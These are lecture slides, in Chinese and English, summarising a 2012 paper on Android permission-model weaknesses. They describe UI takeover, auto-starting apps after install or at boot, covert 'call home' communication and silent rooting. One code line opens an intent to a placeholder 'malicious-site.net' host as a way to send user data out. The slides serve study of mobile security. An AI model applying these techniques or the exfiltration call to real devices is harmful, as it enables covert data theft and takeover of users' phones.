Messing with Android's Permission

Model出處： 2012 IEEE 11th International Conference on Trust, Security

and Privacy in Computing and Communications作者： Andr’e Egners, Ulrike Meyer , Bjorn Marschollek組員： 9720114 王人弘 9820117 陳冠謀 9862218 盧軒偉

Outline1. Introduction2. Related work3. Overview on Android4. Android’s permission model5. Attacks

1. UI takeover2. Starting Applications after Installation3. Starting Applications at Boot4. E.T. Calling Home5. Silently Rooting Android

6. Conclusion 2/23

I. INTRODUCTION

在行動裝置上安裝 APP 時，通常會跳出對話框，要求使用者接受程式所請求的權限或是停止安裝。 使用者對於給予的權限可能會造成什麼風險並不清楚。 Permission Model 的設計上，各種選項的精細程度和可變程度太小，這使攻擊者容易繞過 Permission Model 的控管。 本篇會介紹 Android 的 Permission Model 及一些攻擊的方式。

3/23

II. RELATED WORK

殭屍網路 (botnet) Inter-Application communication Permissions of Android apps 其他安全機制與系統漏洞的相關議題

4/23

III. OVERVIEW ON ANDROID

Based on 2.6 Linux kernel

具有 Linux 的優點 (file, memory management) 和 Java類型的安全性

5/23

III. OVERVIEW ON ANDROID (Cont.)

6/23

III. OVERVIEW ON ANDROID (Cont.)

最底層是 Linux kernel ，包含 process 和 memory 的管理、各種驅動程式……。針對行動裝置的需求進行優化。 第二層是各種函式庫，包含 C library ，圖形的 2D/3D-

graphic library ，整理檔案資料的 SQLite...… 。 同樣在第二層的還有 Android runtime 所需要的東西，主要是 Dalvik Virtual Machine ，由 Java Virtual Machine衍生而來，更適合用在資源有限的裝置上。

7/23

III. OVERVIEW ON ANDROID (Cont.)

Application Framework Layer ：提供 API 給應用程式的開發者使用。其中包含了 Package Manager ( 追蹤管理應用程式和它的資料 ) 、 Location Manager ( 管理應用程式的位置 ) 、 View System (UI 、繪圖 ) …… 。 最上層是應用程式所在的地方， third-party applications都在這層。可以使用下面的框架、函式庫……。

8/23

IV. ANDROID’S PERMISSION MODEL

API version 11,116 different permissions are predefine Ex. INTERNET – allow accessing the Internet RECEIVE_SMS – for monitoring, recording, or processing incoming

SMS RECORD_AUDIO – for recording audio messages

Ex. Tetris game request Internet is reasonable but suspicious if it would also requested the permission to read the address book

9/23

URI Permissions

Uniform Resource Identifier Applications may wish to pass a URI to another application in order to

be able to exchange data. For example, an email application usually protects its emails from

being read by other applications using additionally defined permissions.

a third-party image viewer should not hold the permissions to read emails directly.

image viewer should rather be handed a URI to the data by using the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI.

10/23

Permission protection level

Level zero – normal permissions ,low risk setting timer, making the phone vibrate

the user can request to be notified of the permission request prior to the installation of the application.

Level one – dangerous permissions ,high risk initiating phone calls, access to the device’s sensors, the Internet, or sensitive user data, read log file Prior to the installation, installer displays the set of requested dangerous

permissions to the user, which decides to either grant or deny the set permissions Only if the user gives his consent to all of the requested permissions, the application can successfully be installed.

11/23

Permission protection level (Cont.)

Level two – signature permissions only if the requesting application is signed with the same certificate as the application that declared the permission

user agree but no signature cannot be granted Level three – signatureOrSystem only to applications that are in the Android system

image or that are signed with the same certificates .

12/23

Permission protection level (Cont.)

some flaws the user is only able to grant or deny all permissions at once. granting or denying a particular permission is not possible. refraining from installing an application which might be useful, but

requests too many or a suspicious set of permissions.

Tetris example

13/23

Known Vulnerabilities

Log permissions

FAT32 formatted SD cards

WebKit browser

Most uncovered the past years

14/23

V. ATTACKS

1.Taking over the UI2.Starting directly after installation3.Also starting at boot4.Two-way Internet communication5.Silently rooting the device

An attack path to silently root android

15/23

1.UI takeover• KeyIntercepter

- onKeyDown() : handle or pass

- handle them but doing nothing

• The Home button

- Return to Home screen or Show a list of the recently used

• Installing from Android Market

- The install button -??-> The OK button

16/23

2.Starting Applications after Installation• Would the user start the app?

• to receive the INSTALL_REFERRER intent

- Google Analytics SDK

- chosen by the attacker

17/23

2.Starting Applications after Installation (Cont.)<receiver

Android:name=“com.google.android.apps.analytics.AnalyticsReceiver”

Android:exported=“true” >

<intent-filter>

<action android:nace=“com.android.vending.INSTALL_REFERRER”/>

</intent-filter>

</receiver>

18/23

3.Starting Applications at Boot BOOT_COMPLETED intent Permission –RECEIVE_BOOT_COMPLETED is introduced to

prevent from illegitimately starting at system boot... but is forgotten

Successfully listenning for the intent without asking for permission

19/23

4.E.T. Calling Home Establishing bidiectional outside communication e.g. a specified dropzone delivering user data ， or a command & control server of a botnet-----------------------------VIEW

intent---------------------------------------------startActivity(new Intent(Intent.ACTION_VIEW, Uri. Parse(''http://malicious-site.net'')). setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));

20/23

4.E.T. Calling Home (Cont.) Request HTTP GET to send data URI schemes : deliver data to applications SilentCommunicator- screen off: start the transmission- screen on: browser hide

21/23

5.Silently Rooting Android

modified zimperlich-jailbreak:each instance runs with root privileges

setuid() calls which intended to change the owner to the user but has been assigned to the calling application -> fail

infinite loop which executes the native code until exception Root user can install app and the device owner will not notice!

22/23

VI. CONCLUSION

本篇文章提供了一些 Android 權限模型的漏洞。攻擊者可藉由這些漏洞，偷偷的建立雙向的通道，並下載額外的攻擊。更可以利用不令人起疑的授權請求，來做更複雜的攻擊。

23/23